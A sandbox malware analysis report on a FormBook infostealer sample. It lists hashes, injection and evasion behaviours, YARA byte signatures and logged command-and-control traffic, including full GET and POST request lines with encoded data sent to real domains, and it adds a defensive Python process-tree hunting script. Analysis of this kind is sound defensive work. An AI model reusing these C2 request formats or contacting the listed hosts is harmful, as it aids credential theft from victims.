
Windows Analysis Report
Documente de expediere.exe

Overview

General Information

Sample name: Documente de expediere.exe
Analysis ID: 1477464
MD5: 3ed2eca087936d7ab479ce62c50a9f2a
SHA1: 0616bdb97bf793a387359ca33a089b328d131519
SHA256: 42b9ac8b067460277e68574662bc607f84664a9c622608dec68e62e608dc9444
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Documente de expediere.exe (PID: 4092 cmdline: "C:\Users\user\Desktop\Documente de expediere.exe" MD5: 3ED2ECA087936D7AB479CE62C50A9F2A)
    • svchost.exe (PID: 400 cmdline: "C:\Users\user\Desktop\Documente de expediere.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • QAWHbhvedb.exe (PID: 396 cmdline: "C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • certutil.exe (PID: 7364 cmdline: "C:\Windows\SysWOW64\certutil.exe" MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
          • QAWHbhvedb.exe (PID: 6392 cmdline: "C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7584 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Source | Rule | Description | Author | Strings
0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2aae0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x1411f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x25760a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x240c49:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(further memory-dump entries not shown on this page)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2d0e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x16722:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2dee3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x17522:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started | Author: Florian Roth (Nextron Systems)
              Command / CommandLine / ProcessCommandLine: "C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe" | CommandLine|base64offset|contains: )^
              Image / NewProcessName / OriginalFileName: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | ProcessId: 6392 | ProcessName: QAWHbhvedb.exe
              ParentCommandLine: "C:\Windows\SysWOW64\certutil.exe" | ParentImage: C:\Windows\SysWOW64\certutil.exe | ParentProcessId: 7364 | ParentProcessName: certutil.exe
            Source: Process started | Author: Florian Roth (Nextron Systems)
              Command / CommandLine / ProcessCommandLine: "C:\Users\user\Desktop\Documente de expediere.exe" | CommandLine|base64offset|contains: u
              Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\svchost.exe | ProcessId: 400 | ProcessName: svchost.exe
              ParentCommandLine: "C:\Users\user\Desktop\Documente de expediere.exe" | ParentImage: C:\Users\user\Desktop\Documente de expediere.exe | ParentProcessId: 4092 | ParentProcessName: Documente de expediere.exe
            Source: Process started | Author: vburov
              Command / CommandLine / ProcessCommandLine: "C:\Users\user\Desktop\Documente de expediere.exe" | CommandLine|base64offset|contains: u
              Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\svchost.exe | ProcessId: 400 | ProcessName: svchost.exe
              ParentCommandLine: "C:\Users\user\Desktop\Documente de expediere.exe" | ParentImage: C:\Users\user\Desktop\Documente de expediere.exe | ParentProcessId: 4092 | ParentProcessName: Documente de expediere.exe
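The Sigma matches above all hang on the same observation: a process whose image does not fit its parent or its own command line. The Python below is an added example, not code from the Joe Sandbox report. It rebuilds the report's process tree as Sysmon-style process_creation events and applies three checks: svchost.exe started by something other than the service control manager, an image whose on-disk name differs from the executable named in its command line (PID 400 is svchost.exe running under the sample's own command line, the footprint of a process created suspended and overwritten), and any child of certutil.exe. The svchost.exe parent allow-list, the LOLBin list and the benign control event (PID 900) are this example's assumptions; the parent of PID 4092 is not recorded on the page and is left empty.

```python
"""Process-tree checks behind the Sigma matches in this report.

Added example, not code from the Joe Sandbox report. The events below are
rebuilt from the report's process tree and "Process started" data, using the
Sysmon Event ID 1 / Sigma process_creation field names shown on the page.
The svchost.exe parent allow-list, the LOLBin list and the benign control
event (PID 900) are assumptions made for this example.
"""
import ntpath
from collections import defaultdict

# Processes that legitimately start svchost.exe (assumed; tune for your estate).
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "ngen.exe"}
# Living-off-the-land binaries that should not normally spawn children (assumed subset).
LOLBIN_PARENTS = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "regsvr32.exe"}


def basename(path):
    """Lower-cased file name of a Windows path; '' when the path is missing."""
    return ntpath.basename(path or "").lower()


def exe_from_cmdline(cmdline):
    """Executable a command line names: the quoted first token, else the first space-delimited one."""
    s = (cmdline or "").strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        exe = s[1:end] if end != -1 else s[1:]
    else:
        exe = s.split(" ", 1)[0]
    return basename(exe)


def hunt(events):
    """Return {ProcessId: [finding, ...]} for the three checks this report's tree exercises."""
    findings = defaultdict(list)
    for ev in events:
        pid = ev["ProcessId"]
        image, parent = basename(ev["Image"]), basename(ev.get("ParentImage"))
        # 1. svchost.exe started by something other than the service control manager and friends.
        if image == "svchost.exe" and parent not in SVCHOST_PARENTS:
            findings[pid].append("svchost_uncommon_parent")
        # 2. The image on disk is not the executable the command line names. A process created
        #    suspended and then overwritten keeps the command line it was launched with, so
        #    svchost.exe carrying the sample's own path (PID 400) stands out.
        if exe_from_cmdline(ev.get("CommandLine")) != image:
            findings[pid].append("image_cmdline_mismatch")
        # 3. Child of a LOLBin such as certutil.exe.
        if parent in LOLBIN_PARENTS:
            findings[pid].append("lolbin_parent")
    return dict(findings)


def ancestry(events, pid):
    """Follow ParentProcessId upward; returns lower-cased image names, child first."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:          # stop at the root or on a PID-reuse loop
        seen.add(pid)
        chain.append(basename(by_pid[pid]["Image"]))
        pid = by_pid[pid].get("ParentProcessId")
    return chain


SAMPLE = r"C:\Users\user\Desktop\Documente de expediere.exe"
DROPPED = (r"C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB"
           r"\QAWHbhvedb.exe")
SVCHOST32 = r"C:\Windows\SysWOW64\svchost.exe"
CERTUTIL32 = r"C:\Windows\SysWOW64\certutil.exe"

# Rebuilt from the report's process tree; the parent of PID 4092 is not recorded on the page.
EVENTS = [
    {"ProcessId": 4092, "ParentProcessId": None, "ParentImage": None,
     "Image": SAMPLE, "CommandLine": f'"{SAMPLE}"'},
    {"ProcessId": 400, "ParentProcessId": 4092, "ParentImage": SAMPLE,
     "Image": SVCHOST32, "CommandLine": f'"{SAMPLE}"'},
    {"ProcessId": 396, "ParentProcessId": 400, "ParentImage": SVCHOST32,
     "Image": DROPPED, "CommandLine": f'"{DROPPED}"'},
    {"ProcessId": 7364, "ParentProcessId": 396, "ParentImage": DROPPED,
     "Image": CERTUTIL32, "CommandLine": f'"{CERTUTIL32}"'},
    {"ProcessId": 6392, "ParentProcessId": 7364, "ParentImage": CERTUTIL32,
     "Image": DROPPED, "CommandLine": f'"{DROPPED}" '},
    {"ProcessId": 7584, "ParentProcessId": 7364, "ParentImage": CERTUTIL32,
     "Image": r"C:\Program Files\Mozilla Firefox\Firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
    # Constructed benign control: an ordinary service host, which must produce no finding.
    {"ProcessId": 900, "ParentProcessId": 700, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for pid, hits in sorted(hunt(EVENTS).items()):
        print(pid, ", ".join(hits), "| chain:", " <- ".join(ancestry(EVENTS, pid)))
```

Run stand-alone it prints PIDs 400, 6392 and 7584 with their findings and their chain back to the sample; the check that does the most work is the image/command-line comparison, which needs no allow-list at all. Note that an unquoted command line whose path contains spaces cannot be resolved reliably by the first-token rule, so feed it the quoted form your EDR records.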
            No Snort rule has matched
            Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
            2024-07-21T13:31:10.500548+0200 | 2050745 | 49704 | 80 | TCP | Malware Command and Control Activity Detected
            2024-07-21T13:31:39.802184+0200 | 2050745 | 49709 | 80 | TCP | Malware Command and Control Activity Detected
            2024-07-21T13:31:53.199532+0200 | 2050745 | 49713 | 80 | TCP | Malware Command and Control Activity Detected
            2024-07-21T13:32:06.994854+0200 | 2050745 | 49717 | 80 | TCP | Malware Command and Control Activity Detected
            2024-07-21T13:32:21.613906+0200 | 2050745 | 49721 | 80 | TCP | Malware Command and Control Activity Detected
            2024-07-21T13:32:39.957553+0200 | 2050745 | 49725 | 80 | TCP | Malware Command and Control Activity Detected
            2024-07-21T13:32:53.501283+0200 | 2050745 | 49729 | 80 | TCP | Malware Command and Control Activity Detected
            2024-07-21T13:33:06.685839+0200 | 2050745 | 49733 | 80 | TCP | Malware Command and Control Activity Detected
            2024-07-21T13:33:19.877840+0200 | 2050745 | 49737 | 80 | TCP | Malware Command and Control Activity Detected
            2024-07-21T13:33:33.452707+0200 | 2050745 | 49741 | 80 | TCP | Malware Command and Control Activity Detected
            2024-07-21T13:33:46.714145+0200 | 2050745 | 49745 | 80 | TCP | Malware Command and Control Activity Detected
            2024-07-21T13:34:00.273875+0200 | 2050745 | 49749 | 80 | TCP | Malware Command and Control Activity Detected
            2024-07-21T13:34:32.188050+0200 | 2050745 | 49753 | 80 | TCP | Malware Command and Control Activity Detected

            AV Detection

            Source: Documente de expediere.exe | ReversingLabs: Detection: 73%
            Source: Documente de expediere.exe | Virustotal: Detection: 50%
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Documente de expediere.exe | Joe Sandbox ML: detected
            Source: Documente de expediere.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QAWHbhvedb.exe, 0000000D.00000002.3704141726.0000000000B0E000.00000002.00000001.01000000.00000005.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1609949459.0000000000B0E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Documente de expediere.exe, 00000000.00000003.1253941006.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Documente de expediere.exe, 00000000.00000003.1256736614.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1430299412.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428303783.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.000000000319E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3714307025.00000000055E0000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3714307025.000000000577E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1544921671.0000000005438000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1541505660.000000000528A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Documente de expediere.exe, 00000000.00000003.1253941006.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Documente de expediere.exe, 00000000.00000003.1256736614.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1430299412.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428303783.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.000000000319E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, certutil.exe, 0000000E.00000002.3714307025.00000000055E0000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3714307025.000000000577E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1544921671.0000000005438000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1541505660.000000000528A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: certutil.pdb source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: certutil.exe, 0000000E.00000002.3705861434.0000000003601000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3715079219.0000000005C0C000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.0000000002B3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1899080068.0000000001CDC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: certutil.exe, 0000000E.00000002.3705861434.0000000003601000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3715079219.0000000005C0C000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.0000000002B3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1899080068.0000000001CDC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: certutil.pdbGCTL source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function 0_2_006F4696: GetFileAttributesW, FindFirstFileW, FindClose
            Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function 0_2_006FC93C: FindFirstFileW, FindClose
            Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function 0_2_006FC9C7: FindFirstFileW, FindClose, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf
            Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function 0_2_006FF200: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, GetFileAttributesW, SetFileAttributesW, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
            Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function 0_2_006FF35D: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
            Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function 0_2_006FF65E: FindFirstFileW, Sleep, _wcscmp, _wcscmp, FindNextFileW, FindClose
            Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function 0_2_006F3A2B: FindFirstFileW, DeleteFileW, DeleteFileW, MoveFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
            Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function 0_2_006F3D4E: FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
            Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function 0_2_006FBF27: FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose
            Source: C:\Windows\SysWOW64\certutil.exe | Code function 14_2_032BBE20: FindFirstFileW, FindNextFileW, FindClose
            Source: C:\Windows\SysWOW64\certutil.exe | Code function 14_2_032A97C0: 4x nop then xor eax, eax
            Source: C:\Windows\SysWOW64\certutil.exe | Code function 14_2_05430548: 4x nop then mov ebx, 00000004h
            Source: Joe Sandbox View | IP Address: 103.168.172.37
            Source: Joe Sandbox View | IP Address: 13.248.169.48
            Source: Joe Sandbox View | IP Address: 188.114.97.3
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (17 occurrences)
            Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function 0_2_007025E2: InternetReadFile, InternetQueryDataAvailable, InternetReadFile
            Source: global traffic | HTTP traffic detected: 13 GET requests, all with the same headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Host | Request line
            www.italyuntold.com | GET /5yb0/?5HE=6Dg8z4KG4YPExlQ9XMiCDUjuBaAtCe8c6s2BJ4Cptukw6Fp783jCo9a8aBIuYHvq1uoCHxO9BKTCqzYY5Vc8A4FzhFFqSFNP5lWxTqvoYXkdyieyJBVlwNBJ3PLm6lrF0y9xthhOWCBy&UXR=kTP8XfI8 HTTP/1.1
            www.funnelkakes.com | GET /sgjw/?5HE=KIlhclE33g4p4bCYeWfzGem6xaRipp25IwoHZsonIzqxF8P3vwkjyQxG0+k1uafiZ5V1+a0hVzemZgjWOIKcqi50j1ligTTnKiK+69bNO3Q0fQNjMb89nuUv03Pn1kYgjPKVAy4urBGQ&UXR=kTP8XfI8 HTTP/1.1
            www.shiybalinks.com | GET /knjl/?5HE=HK1J84a27gkQ4beEKC61UbBVEOGAatJ0tiVbzvXViKVP6nm44mJHR8I5ZHuKj7DoAb3eP5+6cpVF46y42P5lmjxSIvkSYBgtFYg212IX7KyLN1Uz7dQ5iXPzMiB/yXbJ01avbd6tiSoS&UXR=kTP8XfI8 HTTP/1.1
            www.olhadeputat.com | GET /xm40/?5HE=daAh1PvHixV61uAQZMYKPaNePBcxkEwbh0Ym6iIWO855OlL+0fA+LsjnAgtj7WyOZoCeoLSk25i6sMGFDrtEZ/sdfpdR1CdNhpbdr9VgkorBlDalMPv+Xn4VuwyhQF+VdIAPT792X8nN&UXR=kTP8XfI8 HTTP/1.1
            www.jleabres.com | GET /w977/?5HE=Azoptr76oomZ4omVga/Zpvzn3e5/jEQILAaug91rkSWZLV4kzjGPp1+9B2L+PrxFmPSw5JOBqYEy7G3QmPMO+i+kevqWQBtSr1hLWjIV+6WjfyA1QEzp+Ir7n0GaYPvcmgAl6gWaxTBt&UXR=kTP8XfI8 HTTP/1.1
            www.evoolihubs.shop | GET /bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN+QA3R40qpI1p3EHt4xIxf5IDvSUmLm24xdAndElLjryJNFC6VX5rU/4u1ZoNU71gjUwgGDzFCy1dhdBzksntmTnqyiroVCcmEoAnVJrC&UXR=kTP8XfI8 HTTP/1.1
            www.fardehb.top | GET /or4s/?5HE=UOVTILZNORwRjwgBkAdUsPPg2JHxvT7McsE496DqNpR2tR/wGus0wQl5jLS0JR4P7qKOiEjtUO6PhFxn6GFMV2L3p99CK/w4pk8/xjMAjlx+vsYxSa6ADJMuQ/dVnyYbrtzDu6vYzAhS&UXR=kTP8XfI8 HTTP/1.1
            www.sehraji.com | GET /rjez/?5HE=bn6Kcb/G7NRz+77UcQJW4qLiu1GocAgaZTa4wjHl00pV2XIs1a9SZ4czJq6TxPof2hMjxPpppayxuFpboBicziwpjYC97Q/w/47U8Wa1V0+MlpjcY/2kLWYOIWUc1P6D3HPWzK7wcq5j&UXR=kTP8XfI8 HTTP/1.1
            www.ecoaxion.com | GET /m8jb/?5HE=9yAQtAPv7VajbMozC95KjxHcDgZBNAloOjx9xoxEZfGfjxdjUWGlbu7OvwZLKHzd+pQOJ7zTb4VBUF6T+jZVGdwVGTofMGVOhhQduo/gOWAVXXfufsk0uisH+JnvVli93h1SVJOpBT3C&UXR=kTP8XfI8 HTTP/1.1
            www.809934.com | GET /vqsg/?5HE=oEbg7hQU3MdCAI1Qzg6FnUbuYrpcD6PCFR/op5n6toe9jhHpPI7gLsdW3wxEsJ1FGff0/+qDBwgK/n9QPqrWSnFVgwucvZm42LyzbELDPU/Ii2JDfpNRbGk3upTzOCY2A4WqGnxtTcSM&UXR=kTP8XfI8 HTTP/1.1
            www.betano627.com | GET /5jc8/?5HE=SGmAsJs22AX1ghH/bJyjJOhI3u1qaDFYGxKt82Fw19pLlHDYBaMekb65pyujOkSYs7LYFrx9Bf/HP6/nbBjkeU53huHOszAAxfxDrGe5Zlk4W5YDgBaJ8zAbn1c/SvwA0vRZEPbSBJgr&UXR=kTP8XfI8 HTTP/1.1
            www.nationsincbook.com | GET /ka5q/?5HE=sbHYTBVMO+ZN3cimlSddhWyxOd9+ryqDwURfGp0ztBsxBU1bfXTxhmHIz6dWKnPi5VSox+9kY/vve8cZkTHpuVybjDJHaA/MeMU7Z/Kl4srSdSD7kaL79EM6BOjJOd/XEoe9QrfXL9O6&UXR=kTP8XfI8 HTTP/1.1
            www.karak-networks.online | GET /2afv/?5HE=hLY9GbFjrTr/Z7Z1J1n+8mxvovTjHVjaQ1TETPlxVVMVYtq2nLqFQ+qvrj4cFtmldoUiHIajNLHyMvL4kY+KeK3n/v9QeqmigNuoWlpmTNFJx52laQwxR7zETdE9Da/cctIuDpSkBIav&UXR=kTP8XfI8 HTTP/1.1
            Source: global trafficDNS traffic detected: DNS query: www.marktuana.com
            Source: global trafficDNS traffic detected: DNS query: www.italyuntold.com
            Source: global trafficDNS traffic detected: DNS query: www.funnelkakes.com
            Source: global trafficDNS traffic detected: DNS query: www.shiybalinks.com
            Source: global trafficDNS traffic detected: DNS query: www.olhadeputat.com
            Source: global trafficDNS traffic detected: DNS query: www.jleabres.com
            Source: global trafficDNS traffic detected: DNS query: www.evoolihubs.shop
            Source: global trafficDNS traffic detected: DNS query: www.fardehb.top
            Source: global trafficDNS traffic detected: DNS query: www.sehraji.com
            Source: global trafficDNS traffic detected: DNS query: www.ecoaxion.com
            Source: global trafficDNS traffic detected: DNS query: www.809934.com
            Source: global trafficDNS traffic detected: DNS query: www.betano627.com
            Source: global trafficDNS traffic detected: DNS query: www.nationsincbook.com
            Source: global trafficDNS traffic detected: DNS query: www
            Source: global trafficDNS traffic detected: DNS query: www.karak-networks.online
            Source: global trafficDNS traffic detected: DNS query: www.gtprivatewealth.com
            Source: unknown | HTTP traffic detected: POST /sgjw/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | Host: www.funnelkakes.com | Origin: http://www.funnelkakes.com | Connection: close | Content-Length: 216 | Content-Type: application/x-www-form-urlencoded | Cache-Control: no-cache | Referer: http://www.funnelkakes.com/sgjw/ | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: 5HE=HKNBfQ882ig54Y6VaSCpTLSn3rpuj4u1HSBYRtYuEx7pY5LDkApTzjIE5P4Z1bjlR8Nm9OpaHjKsMhWQPISulg5xk1F9rTvzPziiyOqfPH4FehxnD9s3ldIq53n69WNygsS6AC04r3aXUk3PDsuAIINibJ8Hg6WESaTgI+JtzRk2U7vduNFxjpYW8MfhGno4ig0pNgCjGsfMUGAjcg==
